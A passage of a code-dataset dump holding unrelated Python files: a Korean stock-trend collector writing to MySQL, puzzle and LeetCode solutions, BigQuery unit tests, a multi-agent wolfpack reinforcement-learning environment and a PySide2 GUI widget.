lines)\nplt.savefig(\"niskopodlogowe.png\")\nplt.show()\n\n","sub_path":"wykresy.py","file_name":"wykresy.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"117815600","text":"#!/usr/bin/python\nimport requests\nimport datetime\nimport pandas as pd\nfrom pandas import DataFrame\nimport io, os\n# user define package import\nimport sys\nsys.path.append(\"../../favis\")\nfrom msgbot.favisbot import favisbot\nimport util.krx_util as util\nimport util.favis_util as favis\nimport pymysql\n\nconn = favis.get_favis_mysql_connection()\ncur = conn.cursor()\ndf_sm = pd.read_sql_query('SELECT * FROM stock_info', conn)\n\nprint (datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d %H:%M:%S'))\nfor idx, row in df_sm.iterrows():\n\tstock_code = row['code']\n\tstock_name = row['name']\n\t#print (row['code'], util.getIsinCode(row['code']))\n\n\tyear_start = 2010\n\tyear_end = 2016\n\tfor year in range(year_start, year_end + 1):\n\t\tprint(stock_code, stock_name, year)\n\t\tstart = datetime.datetime(year, 1, 1).strftime('%Y%m%d')\n\t\tend = datetime.datetime(year, 12, 31).strftime('%Y%m%d')\n\n\t\tisu_cd = util.getIsinCode(stock_code)\n\n\t\tpath = \"./data/\"\n\t\tfilename = path + stock_code + \"_\" + start + \"-\" + end + \"-trend.xls\"\n\t\tif not os.path.exists(filename):\n\t\t\tr = util.get_krx_daily_sellbuy_trend(isu_cd, start, end)\n\t\t\twith open(filename, 'wb') as f:\n\t\t\t\t#f.write(r.content.decode('utf-8'))\n\t\t\t\tf.write(r)\n\n\n\t\t#df = pd.read_excel(filename, thousands=',', usecols=['년/월/일', '종가','대비','거래량(주)','기관_순매수(주)','외국인_순매수(주)'])\n\t\tdf = pd.read_excel(filename, thousands=',', usecols=['년/월/일', '기관_순매수(주)','외국인_순매수(주)'])\n\t\tdf = df.dropna()\n\t\tdf.columns = ['date','i_volume', 'f_volume']\n\t\t# df['date'] = pd.to_datetime(df['date'], format='%Y-%m-%d')\n\t\tdf['date'] = df['date'].str.replace('/','')\n\t\tdf_cp = df[['date','i_volume', 'f_volume']].copy()\n\t\tdf_cp['stock_code'] = stock_code\n\t\t# print(df_cp)\n\n\t\tdf_cp = df_cp[['stock_code', 'date','i_volume', 'f_volume']]\n\t\tfor idx, row in df_cp.iterrows():\n\t\t\ttry:\n#\t\t\tcur.executemany('INSERT INTO daily_info (code, date, open, high, low, close, volume, marcap, amount) ' \\\n#\t\t\t\t\t\t'VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s)', data)\n\t\t\t\tcur.execute('INSERT INTO trading_trend (code, date, foreigner, institution) ' \\\n\t\t\t\t\t\t\t'VALUES(%s,%s,%s,%s)', (row['stock_code'], row['date'], row['f_volume'], row['i_volume']))\n\t\n\t\t\t\tconn.commit()\n\t\t\texcept pymysql.IntegrityError:\n\t\t\t\tpass\n\t\t\texcept pymysql.Error as e:\n\t\t\t\tif conn:\n\t\t\t\t\tconn.rollback()\n\t\t\t\tprint (\"error %s\" % e.args[0])\n\ndf = pd.read_sql_query('SELECT * FROM trading_trend limit 5', conn)\nprint(df.head())\nprint(datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d %H:%M:%S'))\nif conn:\n conn.close()\n","sub_path":"collector/get_daily_sellbuy_trend_krx_mysql.py","file_name":"get_daily_sellbuy_trend_krx_mysql.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"153423675","text":"def get_input():\n with open(\"input.txt\", \"r\") as file:\n operations = file.readlines()\n operations = [line.rstrip() for line in operations]\n return operations\n \ndef get_accumulator(operations):\n accmumulator = 0\n seen = set()\n iterator = 0\n status = True\n while True: \n\n # no loops\n if len(operations) - 1 == iterator :\n status = False\n\n if iterator in seen:\n status = False\n return accmumulator, status\n\n operation, acc = operations[iterator ].split(\" \")\n acc = int(acc)\n seen.add(iterator )\n\n if operation == \"nop\":\n iterator += 1\n if operation == \"acc\":\n accmumulator += acc\n iterator += 1 \n if operation == \"jmp\":\n iterator += acc\n if status == False:\n return accmumulator, True \n return accmumulator, False\n\ndef switch_operations(lines):\n iterator = 0\n new_operations = lines.copy()\n for iterator in range(len(new_operations)): \n operation, acc = lines[iterator].split(\" \")\n acc = int(acc)\n\n if operation == \"nop\":\n operation = \"jmp\"\n elif operation == \"jmp\":\n operation = \"nop\"\n new_operations = lines.copy()\n new_operations[iterator] = \" \".join((operation, str(acc)))\n acc, valid = get_accumulator(new_operations)\n if valid:\n return acc\n\n\ndef main():\n operations = get_input()\n accumulator = get_accumulator(operations)[0]\n print(f\"The first answer is : {accumulator}\")\n accumulator = switch_operations(operations)\n print(f\"The second answer is : {accumulator}\")\n\nif __name__ == \"__main__\":\n main()","sub_path":"day8/halting.py","file_name":"halting.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"154190403","text":"# -*- encoding = \"utf-8\" -*-\n__author__ = 'Administrator'\nclass Solution(object):\n def sortColors(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n for i in range(len(nums) - 1,0,-1):\n for j in range(0,i):\n if nums[j] > nums[j + 1]:\n nums[j],nums[j + 1] = nums[j + 1],nums[j]\n\nsol = Solution()\nnums = [0,1,2,0,1,2]\nsol.sortColors(nums)\nfor i in nums:\n print(i,end=\" \")","sub_path":"LeetCode/SortColors.py","file_name":"SortColors.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"199923880","text":"\"\"\"\nUnit Test for the bq module\n\nEnsures the define_dataset and update_labels_and_tag functions have the proper parameters passed\n to them. Ensures update_labels_and_tags function returns a dictionary of either the existing\n labels and or tags or the labels and or tags that need to be updated.\n\nOriginal Issues: DC-757, DC-758\n\nThe intent is to check the proper parameters are passed to define_dataset and update_labels_and_tags\n function as well as to check to make sure the right labels and tags are returned in the\n update_labels_and_tags function.\n\"\"\"\n\n# Python imports\nimport unittest\n\n# Third-party imports\nfrom google.cloud import bigquery\n\n# Project imports\nfrom utils.bq import define_dataset, update_labels_and_tags\n\n\nclass BqTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n print('**************************************************************')\n print(cls.__name__)\n print('**************************************************************')\n\n def setUp(self):\n # Input parameters expected by the class\n self.project_id = 'bar_project'\n self.dataset_id = 'foo_dataset'\n self.description = 'fake_description'\n self.existing_labels_or_tags = {'label': 'value', 'tag': ''}\n self.new_labels_or_tags = {'label': 'new_value', 'new_tag': ''}\n self.updated = {'tag': '', 'label': 'new_value', 'new_tag': ''}\n\n def test_define_dataset(self):\n # Tests if project_id is given\n self.assertRaises(RuntimeError, define_dataset, None, self.dataset_id,\n self.description, self.existing_labels_or_tags)\n\n # Tests if dataset_id is given\n self.assertRaises(RuntimeError, define_dataset, self.project_id, None,\n self.description, self.existing_labels_or_tags)\n\n # Tests if description is given\n self.assertRaises(RuntimeError, define_dataset, self.project_id,\n self.dataset_id, (None or ''),\n self.existing_labels_or_tags)\n\n # Tests if no label or tag is given\n self.assertRaises(RuntimeError, define_dataset, self.project_id,\n self.dataset_id, self.description, None)\n\n # Pre-conditions\n results = define_dataset(self.project_id, self.dataset_id,\n self.description, self.existing_labels_or_tags)\n\n # Post conditions\n self.assertIsInstance(results, bigquery.Dataset)\n self.assertEqual(results.labels, self.existing_labels_or_tags)\n\n def test_update_labels_and_tags(self):\n # Tests if dataset_id param is provided\n self.assertRaises(RuntimeError, update_labels_and_tags, None,\n self.existing_labels_or_tags, self.new_labels_or_tags)\n\n # Tests if new_labels_or_tags param is provided\n self.assertRaises(RuntimeError, update_labels_and_tags, self.dataset_id,\n self.existing_labels_or_tags, None)\n\n # Pre-conditions\n results = update_labels_and_tags(self.dataset_id,\n self.existing_labels_or_tags,\n self.new_labels_or_tags, True)\n\n # Post conditions\n self.assertEqual(results, self.updated)\n with self.assertRaises(RuntimeError):\n update_labels_and_tags(self.dataset_id,\n existing_labels_or_tags={'label': 'apples'},\n new_labels_or_tags={'label': 'oranges'},\n overwrite_ok=False)\n","sub_path":"tests/unit_tests/data_steward/utils/bq_test.py","file_name":"bq_test.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"281338645","text":"from random import randint\nfrom random import sample\nfrom player import Player\nfrom food import Food\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass State(object) :\n\t\tdef __init__(self, sight_sideways, sight_radius,num_players, max_food_num, arena_size, levelMap, food_rate = 5, num_game_frames = 100000,coop_radius = 12, groupMultiplier = 2, obsMode = \"PARTIAL\"):\n\t\t\tself.obsMode = obsMode\n\t\t\tself.x_size = arena_size[0]\n\t\t\tself.y_size = arena_size[1]\n\t\t\tself.max_food_num = max_food_num\n\t\t\tself.coordinate_pairs = [(i*2,j*2) for i in range(1,arena_size[0]-1) for j in range(1,arena_size[1]-1)]\n\t\t\tself.obstacleCoord = [(iy*2,ix*2) for ix, row in enumerate(levelMap) for iy, i in enumerate(row) if i]\n\t\t\tself.possibleCoordinates = list(set(self.coordinate_pairs) - set(self.obstacleCoord))\n\t\t\trandom_player_positions = sample(range(len(self.possibleCoordinates)), num_players)\n\t\t\t# coordinates = [self.possibleCoordinates[ii] for ii in random_player_positions]\n\t\t\t# self.player_list = [Player(i,j) for (i,j) in coordinates]\n\t\t\tself.player_list = []\n\t\t\tself.food_list = []\n\t\t\t#Find out about this\n\t\t\tself.food_rate = food_rate\n\t\t\t#Find out about this\n\t\t\tself.waiting_time = food_rate\n\t\t\tself.remaining_game_frames = num_game_frames\n\t\t\tself.sight_sideways = sight_sideways\n\t\t\tself.sight_radius = sight_radius\n\t\t\tself.coopRadius = coop_radius\n\t\t\tself.wolfPerCapture = []\n\t\t\tself.groupMultiplier = groupMultiplier\n\t\t\t#self.addFood()\n\t\t\n\t\tdef reset(self,num_players,levelMap, food_rate = 5, num_game_frames = 100000):\n\t\t\tself.coordinate_pairs = [(i*2,j*2) for i in range(1,self.x_size-1) for j in range(1,self.y_size-1)]\n\t\t\tself.obstacleCoord = [(iy*2,ix*2) for ix, row in enumerate(levelMap) for iy, i in enumerate(row) if i]\n\t\t\tself.possibleCoordinates = list(set(self.coordinate_pairs) - set(self.obstacleCoord))\n\t\t\trandom_player_positions = sample(range(len(self.possibleCoordinates)), num_players)\n\t\t\tcoordinates = [self.possibleCoordinates[ii] for ii in random_player_positions]\n\t\t\tii = 0\n\t\t\tfor player in self.player_list:\n\t\t\t\tplayer.reset(coordinates[ii])\n\t\t\t\tii += 1\n\n\t\t\tii = 0\n\t\t\tfoodCoordinates = list(set(self.possibleCoordinates) - set(coordinates))\n\t\t\trandom_food_positions = sample(range(len(foodCoordinates)), len(self.food_list))\n\t\t\tfood_coordinates = [foodCoordinates[jj] for jj in random_food_positions]\n\t\t\tfor food in self.food_list:\n\t\t\t\tfood.reset(food_coordinates[ii])\n\t\t\t\tii += 1\n\n\t\t\tself.food_rate = food_rate\n\t\t\tself.waiting_time = food_rate\n\t\t\tself.remaining_game_frames = num_game_frames\n\t\t\tself.wolfPerCapture = []\n\t\t\t#self.addFood()\n\n\t\tdef updateState(self):\n\t\t\t\n\t\t\tcollectiveAction,collectiveActionFood = self.getCollectiveAct()\n\t\t\tself.update_state(collectiveAction,collectiveActionFood)\n\t\t\n\t\tdef sense(self,newRGB,ExperienceFlag=False,lastExpFlag=False,mode=\"FULL_IMAGE\"):\n\t\t\tself.RGBMatrix = newRGB\n\t\t\tRGBObservation = None\n\t\t\tif mode == \"FULL_IMAGE\":\n\t\t\t\tfor player in self.player_list:\n\t\t\t\t\tif self.obsMode == \"PARTIAL\":\n\t\t\t\t\t\tRGBObservation = self.computeObservation(self.RGBMatrix, player)\n\t\t\t\t\telse:\n\t\t\t\t\t\tRGBObservation = self.computeFullObservation(self.RGBMatrix, player)\n\t\t\t\t\tplayer.sense(RGBObservation,ExperienceFlag=ExperienceFlag,LastExpFlag=lastExpFlag)\n\n\t\t\t\tfor food in self.food_list:\n\t\t\t\t\tif self.obsMode == \"PARTIAL\":\n\t\t\t\t\t\tRGBObservation = self.computeObservation(self.RGBMatrix, food)\n\t\t\t\t\telse:\n\t\t\t\t\t\tRGBObservation = self.computeFullObservation(self.RGBMatrix, food)\n\t\t\t\t\tfood.sense(RGBObservation,ExperienceFlag=ExperienceFlag,LastExpFlag=lastExpFlag)\n\t\t\telse:\n\t\t\t\tplayer_coords = [(player.x,player.y) for player in self.player_list]\n\t\t\t\tfood_coords = [(food.x,food.y) for food in self.food_list if not food.is_dead]\n\t\t\t\tobstacleCoord = [(obstacle[0],obstacle[1]) for obstacle in self.obstacleCoord]\n\t\t\t\tif self.obsMode == \"PARTIAL\":\n\t\t\t\t\tplayer_coords = [(x,y) for (x,y) in player_coords if x>=top and x=left and y=top and x=left and y=top and x=left and y= 2]\n\t\t\tres = set([item for sublist in doubles for item in sublist])\n\t\t\tfor ii in range(len(self.player_list)):\n\t\t\t\tif ii not in res:\n\t\t\t\t\tself.player_list[ii].setIndex(post_player_position[ii])\n\t\t\t\telse:\n\t\t\t\t\tself.player_list[ii].setIndex(prev_player_position[ii])\n\n\t\t\t#Calculate new food locations\n\t\t\tupdate_results = self.calculate_new_position(collectiveActFood,prev_food_position,prev_food_orientation)\n\t\t\tpost_food_position = [(a,b) for (a,b,c) in update_results]\n\t\t\tpost_food_orientation = [c for (a,b,c) in update_results]\n\t\t\tfor ii in range(len(self.food_list)):\n\t\t\t\tself.food_list[ii].orientation = post_food_orientation[ii]\n\t\t\t\n\t\t\t#Calculate food intersection\n\t\t\ta, seen, result = post_food_position, set(), {}\n\t\t\tfor idx, item in enumerate(a):\n\t\t\t\tif not self.food_list[idx].is_dead:\n\t\t\t\t\tif item not in seen:\n\t\t\t\t\t\tresult[item] = [idx]\n\t\t\t\t\t\tseen.add(item)\n\t\t\t\t\telse:\n\t\t\t\t\t\tresult[item].append(idx)\n\n\t\t\tgroupings = list(result.values())\n\t\t\tdoubles = [t for t in groupings if len(t) >= 2]\n\t\t\tres = set([item for sublist in doubles for item in sublist])\n\t\t\tfor ii in range(len(self.food_list)):\n\t\t\t\tif ii not in res:\n\t\t\t\t\tself.food_list[ii].setIndex(post_food_position[ii])\n\t\t\t\telse:\n\t\t\t\t\tself.food_list[ii].setIndex(prev_food_position[ii])\n\t\t\t\t\t\t\n\t\t\t# Calculate player points and food status\n\t\t\tself.update_food_status(self.player_list)\n\t\t\t\n\t\t\t\n\t\t\tif self.waiting_time == 0:\n\t\t\t\tself.waiting_time = self.food_rate\n\t\t\t\t#self.addFood()\n\n\t\tdef calculate_new_position(self, collectiveAct, prev_player_position,prev_player_orientation):\n\t\t\tzipped_data = list(zip(collectiveAct, prev_player_position,prev_player_orientation))\n\t\t\tresult = [self.calculate_indiv_position(a,(b,c),d) for (a,(b,c),d) in zipped_data]\n\t\t\treturn result\n\t\t\n\t\tdef calculate_indiv_position(self,action,pair,orientation):\n\t\t\tx = pair[0]\n\t\t\ty = pair[1]\n\t\t\tnext_x = x\n\t\t\tnext_y = y\n\n\t\t\t# go forward\n\t\t\tif action == 0:\n\t\t\t\t#Facing upwards\n\t\t\t\tif orientation == 0:\n\t\t\t\t\tnext_x -= 2\n\t\t\t\t#Facing right\n\t\t\t\telif orientation == 1:\n\t\t\t\t\tnext_y += 2\n\t\t\t\t#Facing downwards\n\t\t\t\telif orientation == 2:\n\t\t\t\t\tnext_x += 2\n\t\t\t\telse:\n\t\t\t\t\tnext_y -= 2\n\n\t\t\t\tif (next_x,next_y) in set(self.possibleCoordinates):\n\t\t\t\t \treturn (next_x,next_y,orientation)\n\t\t\t\telse:\n\t\t\t\t \treturn (x,y,orientation)\n\t\t\t# Step right\n\t\t\telif action == 1:\n\t\t\t\t#Facing upwards\n\t\t\t\tif orientation == 0:\n\t\t\t\t\tnext_y += 2\n\t\t\t\t#Facing right\n\t\t\t\telif orientation == 1:\n\t\t\t\t\tnext_x += 2\n\t\t\t\t#Facing downwards\n\t\t\t\telif orientation == 2:\n\t\t\t\t\tnext_y -= 2\n\t\t\t\telse:\n\t\t\t\t\tnext_x -= 2\n\n\t\t\t\tif (next_x,next_y) in set(self.possibleCoordinates):\n\t\t\t\t \treturn (next_x,next_y,orientation)\n\t\t\t\telse:\n\t\t\t\t \treturn (x,y,orientation)\n\t\t\t#Step back\n\t\t\telif action == 2:\n\t\t\t\t#Facing upwards\n\t\t\t\tif orientation == 0:\n\t\t\t\t\tnext_x += 2\n\t\t\t\t#Facing right\n\t\t\t\telif orientation == 1:\n\t\t\t\t\tnext_y -= 2\n\t\t\t\t#Facing downwards\n\t\t\t\telif orientation == 2:\n\t\t\t\t\tnext_x -= 2\n\t\t\t\telse:\n\t\t\t\t\tnext_y += 2\n\n\t\t\t\tif (next_x,next_y) in set(self.possibleCoordinates):\n\t\t\t\t \treturn (next_x,next_y,orientation)\n\t\t\t\telse:\n\t\t\t\t \treturn (x,y,orientation)\n\t\t\t#Step left\n\t\t\telif action == 3:\n\t\t\t\t#Facing upwards\n\t\t\t\tif orientation == 0:\n\t\t\t\t\tnext_y -= 2\n\t\t\t\t#Facing right\n\t\t\t\telif orientation == 1:\n\t\t\t\t\tnext_x -= 2\n\t\t\t\t#Facing downwards\n\t\t\t\telif orientation == 2:\n\t\t\t\t\tnext_y += 2\n\t\t\t\telse:\n\t\t\t\t\tnext_x += 2\n\n\t\t\t\tif (next_x,next_y) in set(self.possibleCoordinates):\n\t\t\t\t \treturn (next_x,next_y,orientation)\n\t\t\t\telse:\n\t\t\t\t \treturn (x,y,orientation)\n\t\t\t#stay still\n\t\t\telif action == 4:\n\t\t\t\treturn (x,y,orientation)\n\t\t\t#rotate left\n\t\t\telif action == 5:\n\t\t\t\tnew_orientation = 0\n\t\t\t\tif orientation == 0:\n\t\t\t\t\tnew_orientation = 3\n\t\t\t\telif orientation == 1:\n\t\t\t\t\tnew_orientation = 0\n\t\t\t\telif orientation == 2:\n\t\t\t\t\tnew_orientation = 1\n\t\t\t\telse:\n\t\t\t\t\tnew_orientation = 2\n\n\t\t\t\treturn (x,y,new_orientation)\n\t\t\t#rotate right\n\t\t\telse:\n\t\t\t\tnew_orientation = 0\n\t\t\t\tif orientation == 0:\n\t\t\t\t\tnew_orientation = 1\n\t\t\t\telif orientation == 1:\n\t\t\t\t\tnew_orientation = 2\n\t\t\t\telif orientation == 2:\n\t\t\t\t\tnew_orientation = 3\n\t\t\t\telse:\n\t\t\t\t\tnew_orientation = 0\n\n\t\t\t\treturn (x,y,new_orientation)\n\n\t\tdef update_food_status(self,player_list):\n\t\t\tfor food in self.food_list:\n\t\t\t\tfood.add_point(0)\n\n\t\t\tenumFood = list(enumerate(self.food_list))\n\t\t\tfood_locations = [(food.x,food.y) for idx,food in enumFood if not food.isDead()]\n\t\t\tfood_id = [idx for idx,food in enumFood if not food.isDead()]\n\n\t\t\tplayer_locations = [(player.x,player.y) for player in self.player_list]\n\t\t\tset_of_food_location = set(food_locations)\n\t\t\trewardListPlayer = [0]*len(player_locations)\n\n\t\t\tfor player in player_list:\n\t\t\t\tif (player.getIndex() in set_of_food_location):\n\t\t\t\t\tcenter = player.getIndex()\n\t\t\t\t\tcenter = (center[0]+1, center[1]+1)\n\t\t\t\t\tenumerated = enumerate(player_locations)\n\t\t\t\t\tclose = [x for (x,(a,b)) in enumerated if abs(a-center[0]) + abs(b-center[1]) <= self.coopRadius]\n\t\t\t\t\tfor x in close:\n\t\t\t\t\t\tif len(close) < 2:\n\t\t\t\t\t\t\trewardListPlayer[x] += len(close)/4.0\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\trewardListPlayer[x] += self.groupMultiplier*len(close)/4.0\n\t\t\t\t\tself.wolfPerCapture.append(len(close))\n\t\t\t\t\tfood_index = food_locations.index(player.getIndex())\n\t\t\t\t\tself.food_list[food_id[food_index]].add_point(-1/4.0)\n\t\t\t\t\tself.food_list[food_id[food_index]].setDead()\n\n\t\t\tfor ii in range(len(rewardListPlayer)):\n\t\t\t\tself.player_list[ii].add_player_point(rewardListPlayer[ii])\n\n\t\tdef update_status(self):\n\t\t\tfor food in self.food_list:\n\t\t\t\tif food.isDead():\n\t\t\t\t\tfood.remaining_time -= 1\n\t\t\n\t\t#def addFood(self):\n\t\t#\twhile len(self.food_list) < self.max_food_num:\n\t\t#\t\tpossibleCoordinates = list(set(self.possibleCoordinates) - set([(player.x,player.y) for player in self.player_list]))\n\t\t#\t\tpossibleCoordinates = list(set(possibleCoordinates) - set([(food.x,food.y) for food in self.food_list]))\n\t\t#\t\tfood_positions = sample(range(len(possibleCoordinates)), 1)\n\t\t#\t\tchosenCoordinate = possibleCoordinates[food_positions[0]]\n\t\t#\t\tself.food_list.append(Food(chosenCoordinate[0],chosenCoordinate[1]))\n\n\n\t\tdef setEpsilon(self,epsilon):\n\t\t\tfor player in self.player_list:\n\t\t\t\tplayer.epsilon = epsilon\n\t\t\tfor food in self.food_list:\n\t\t\t\tfood.epsilon = epsilon\n\n\n\t\tdef setListOfPlayers(self, listOfPlayers):\n\t\t\tself.player_list = listOfPlayers\n\n\t\tdef setListOfFoods(self,listOfFoods):\n\t\t\tself.food_list = listOfFoods\n\n\t\tdef computeObservation(self, RGBMatrix, player):\n\t\t\tRGBRep = None\n\t\t\tif player.orientation == 3:\n\t\t\t# Facing left\n\t\t\t\tx_left = (player.x+(self.sight_radius)*2) - ((self.sight_sideways//2)*2)\n\t\t\t\tx_right = (player.x+ (self.sight_radius)*2) + ((self.sight_sideways//2)*2) + 2 \n\t\t\t\ty_up = (player.y+(self.sight_radius)*2) - (2*self.sight_radius)\n\t\t\t\ty_down = (player.y+(self.sight_radius)*2) + 2\n\t\t\t\tRGBRep = RGBMatrix[int(x_left):int(x_right),int(y_up):int(y_down)]\n\t\t\t\tRGBRep = RGBRep.transpose((1,0,2))\n\t\t\t\tRGBRep = np.fliplr(RGBRep)\n\t\t\telif player.orientation == 1:\n\t\t\t\t# Facing right\n\t\t\t\tx_left = (player.x+(self.sight_radius)*2) - ((self.sight_sideways//2)*2)\n\t\t\t\tx_right = (player.x+ (self.sight_radius)*2) + ((self.sight_sideways//2)*2) + 2 \n\t\t\t\ty_up = (player.y+(self.sight_radius)*2) + (2*self.sight_radius) + 2\n\t\t\t\ty_down = (player.y+(self.sight_radius)*2)\n\t\t\t\tRGBRep = RGBMatrix[int(x_left):int(x_right),int(y_down):int(y_up)]\n\t\t\t\tRGBRep = RGBRep.transpose((1,0,2))\n\t\t\t\tRGBRep = RGBRep[::-1]\n\t\t\telif player.orientation == 0:\n\t\t\t\t# Facing up\n\t\t\t\tx_left = (player.x+(self.sight_radius)*2) - (2*self.sight_radius)\n\t\t\t\tx_right = (player.x+ (self.sight_radius)*2) + 2\n\t\t\t\ty_up = (player.y+(self.sight_radius)*2) - ((self.sight_sideways//2)*2)\n\t\t\t\ty_down = (player.y+(self.sight_radius)*2) + ((self.sight_sideways//2)*2) + 2 \n\t\t\t\tRGBRep = RGBMatrix[int(x_left):int(x_right),int(y_up):int(y_down)]\n\t\t\telif player.orientation == 2:\n\t\t\t\t# Facing down\n\t\t\t\tx_left = (player.x+(self.sight_radius)*2)\n\t\t\t\tx_right = (player.x+ (self.sight_radius)*2) + (2*self.sight_radius) + 2\n\t\t\t\ty_up = (player.y+(self.sight_radius)*2) - ((self.sight_sideways//2)*2)\n\t\t\t\ty_down = (player.y+(self.sight_radius)*2) + ((self.sight_sideways//2)*2) + 2 \n\t\t\t\tRGBRep = RGBMatrix[int(x_left):int(x_right),int(y_up):int(y_down)]\n\t\t\t\tRGBRep = np.fliplr(RGBRep)\n\t\t\t\tRGBRep = RGBRep[::-1]\n\n\t\t\treturn RGBRep\n \n\t\tdef computeFullObservation(self, RGBMatrix, player):\n\t\t\tRGBRep = None\n\t\t\tx_left = (self.sight_radius)*2\n\t\t\tx_right = -(self.sight_radius)*2 \n\t\t\ty_up = 2*self.sight_radius\n\t\t\ty_down = -2*self.sight_radius\n\t\t\tRGBRep = RGBMatrix[x_left:x_right,y_up:y_down]\n\t\t\tif player.orientation == 3:\n\t\t\t\t# Facing left\n\t\t\t\tRGBRep = RGBRep.transpose((1,0,2))\n\t\t\t\tRGBRep = np.fliplr(RGBRep)\n\t\t\telif player.orientation == 1:\n\t\t\t\t# Facing right\n\t\t\t\tRGBRep = RGBRep.transpose((1,0,2))\n\t\t\t\tRGBRep = RGBRep[::-1]\n\t\t\telif player.orientation == 0:\n\t\t\t\t# Facing up \n\t\t\t\tRGBRep = RGBRep\n\t\t\telif player.orientation == 2:\n\t\t\t\t# Facing down\n\t\t\t\tRGBRep = np.fliplr(RGBRep)\n\t\t\t\tRGBRep = RGBRep[::-1]\n\n\t\t\treturn RGBRep\n\n\t\tdef computeObservationBounds(self, player):\n\t\t\ttop, bottom, left, right = 0, 0, 0, 0\n\t\t\tif self.orientation == 3:\n\t\t\t# Facing left\n\t\t\t\ttop = player.x - ((self.sight_sideways/2)*2)\n\t\t\t\tbottom = player.x + ((self.sight_sideways/2)*2) + 2 \n\t\t\t\tleft = player.y- (2*self.sight_radius)\n\t\t\t\tright = player.y + 2\n\t\t\telif self.orientation == 1:\n\t\t\t\t# Facing right\n\t\t\t\ttop = player.x - ((self.sight_sideways/2)*2)\n\t\t\t\tbottom = player.x + ((self.sight_sideways/2)*2) + 2 \n\t\t\t\tright = player.y + (2*self.sight_radius) + 2\n\t\t\t\tleft = (player.y+(self.sight_radius)*2)\n\t\t\telif self.orientation == 0:\n\t\t\t\t# Facing up\n\t\t\t\ttop = player.x - (2*self.sight_radius)\n\t\t\t\tbottom = player.x + 2\n\t\t\t\tleft = player.y - (self.sight_sideways/2)*2\n\t\t\t\tright = player.y + ((self.sight_sideways/2)*2) + 2 \n\t\t\telif self.orientation == 2:\n\t\t\t\t# Facing down\n\t\t\t\ttop = player.x\n\t\t\t\tbottom = player.x + (2*self.sight_radius) + 2\n\t\t\t\tleft = player.y - ((self.sight_sideways/2)*2)\n\t\t\t\tright = player.y + ((self.sight_sideways/2)*2) + 2 \n\n\t\t\treturn top,bottom,left,right\n\n\t\t\n\t\tdef displayImage(self,image,counter):\n\t\t\tplt.imshow(image)\n\t\t\tplt.savefig('image' + str(counter) +'.png')\n\t\t\t#plt.show()\n\n\t\tdef checkpointing(self, step):\n\t\t\tfor player in self.player_list:\n\t\t\t\tplayer.checkpointing(step)\n\n\n\n\n\n\n\n\n","sub_path":"MultiAgentRL/WolfpackRandom/gameplay.py","file_name":"gameplay.py","file_ext":"py","file_size_in_byte":16647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"596754440","text":"from PySide2.QtWidgets import QVBoxLayout, QWidget\nfrom PySide2.QtCore import QObject, Signal\nfrom ..Utility.StyleUtils import ContentFrame, UtilityFrame\nfrom .UtilityWidgets import ButtonBox, WidgetsArea\nfrom .InputWidgets import AbstractAddWidget, TransactionWidget, TypeWidget, ProductWidget\n\n\nclass AddElementWidget(QWidget):\n def __init__(self):\n super().__init__()\n self.btnbox = ButtonBox()\n self.area = WidgetsArea()\n self.handler = AddHandler(self.btnbox, self.area)\n\n self.init_ui()\n\n def init_ui(self):\n self.setLayout(QVBoxLayout())\n self.layout().setSpacing(0)\n self.layout().setMargin(0)\n self.layout().addWidget(UtilityFrame(self.btnbox))\n self.layout().addWidget(ContentFrame(self.area))\n\n\nclass AddHandler(QObject):\n confirm_clicked = Signal(AbstractAddWidget)\n\n def __init__(self, btnbox: ButtonBox, area: WidgetsArea):\n super().__init__()\n self.btnbox = btnbox\n self.area = area\n self.current_widget = TypeWidget\n self._connect_buttons()\n\n def _connect_buttons(self):\n self.btnbox.typebtn.clicked.connect(\n lambda: self.change_type(0))\n self.btnbox.prodbtn.clicked.connect(\n lambda: self.change_type(1))\n self.btnbox.transbtn.clicked.connect(\n lambda: self.change_type(2))\n self.btnbox.plsbtn.clicked.connect(self.add_new_widget)\n self.btnbox.mnsbtn.clicked.connect(\n lambda: self.area.remove_widget(0))\n\n def change_type(self, t: int):\n self.area.clear()\n types = {0: TypeWidget,\n 1: ProductWidget,\n 2: TransactionWidget}\n self.current_widget = types[t]\n\n def _configure_new_widget(self):\n widget = self.current_widget()\n widget.confirmbtn.clicked.connect(\n lambda: self.confirm_clicked.emit(widget))\n configured_widget = ContentFrame(widget)\n return configured_widget\n\n def add_new_widget(self):\n widget = self._configure_new_widget()\n self.area.add_widget(widget)\n","sub_path":"Gui/AddPage/MainWidget.py","file_name":"MainWidget.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"25417066","text":"class Solution:\n def fourSumCount(self, A: List[int], B: List[int], C: List[int], D: List[int]) -> int:\n AB = [a+b for a in A for b in B]\n CD = [c+d for c in C for d in D]\n \n # Two sum from AB and CD\n counts = 0\n CD_count = collections.Counter(CD)\n for num in AB:\n counts += CD_count.get(-num, 0)\n \n return counts\n","sub_path":"LeetCode-Solutions/454. Four Sum.py","file_name":"454. Four Sum.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"405471440","text":"# -*- coding: utf-8 -*-\n\nfrom sklearn.tree import DecisionTreeClassifier\n\nX = [[1, 1], [1, 1], [1, 0], [0, 1], [0, 1]]\ny = [0, 0, 1, 1, 1]\nmodel = 